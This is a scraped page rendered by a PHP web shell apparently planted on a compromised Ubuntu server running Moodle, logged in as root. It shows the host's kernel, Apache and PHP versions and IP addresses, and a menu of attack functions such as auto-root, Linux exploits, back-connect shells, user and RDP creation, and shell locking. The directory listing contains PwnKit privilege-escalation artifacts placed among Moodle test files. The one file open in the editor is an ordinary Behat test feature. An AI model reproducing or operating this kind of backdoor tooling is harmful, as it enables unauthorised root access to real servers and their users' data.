Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
blocks /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_blocks.feature
931
B
-rwxrwxrwx
behat_blocks.php
6.21
KB
-rwxrwxrwx
configure_block_throughout_sit...
3.06
KB
-rwxrwxrwx
hidden_block_region.feature
2.39
KB
-rwxrwxrwx
hide_blocks.feature
1.27
KB
-rwxrwxrwx
manage_blocks.feature
2.22
KB
-rwxrwxrwx
move_blocks.feature
1.73
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
restrict_available_blocks.feat...
1.7
KB
-rwxrwxrwx
return_block_original_state.fe...
1.98
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : return_block_original_state.feature
@core @core_block Feature: The context of a block can always be returned to it's original state. In order to revert actions when configuring blocks As an admin I need to be able to return the block to original state Scenario: Add and configure a block to display on every page and revert back Given the following "courses" exist: | fullname | shortname | category | | Course 1 | C1 | 0 | And I log in as "admin" When I am on "Course 1" course homepage with editing mode on And I add the "Tags" block Then I should see "Tags" in the "Tags" "block" And I navigate to course participants And I configure the "Tags" block And I set the following fields to these values: | Display on page types | Any page | And I press "Save changes" And I am on "Course 1" course homepage And I add a "Assignment" to section "1" and I fill the form with: | Assignment name | Assignment1 | | Description | Description | And I follow "Assignment1" And I configure the "Tags" block And I set the following fields to these values: | Display on page types | Any assignment module page | And I press "Save changes" And I should see "Tags" in the "Tags" "block" And I am on "Course 1" course homepage And "Tags" "block" should not exist And I navigate to course participants And "Tags" "block" should not exist And I am on "Course 1" course homepage And I add a "Assignment" to section "1" and I fill the form with: | Assignment name | Assignment2 | | Description | Description | And I follow "Assignment2" And I should see "Tags" in the "Tags" "block" And I configure the "Tags" block And I set the following fields to these values: | Display on page types | Any page | And I press "Save changes" And I am on "Course 1" course homepage And I should see "Tags" in the "Tags" "block" And I navigate to course participants And I should see "Tags" in the "Tags" "block"
Close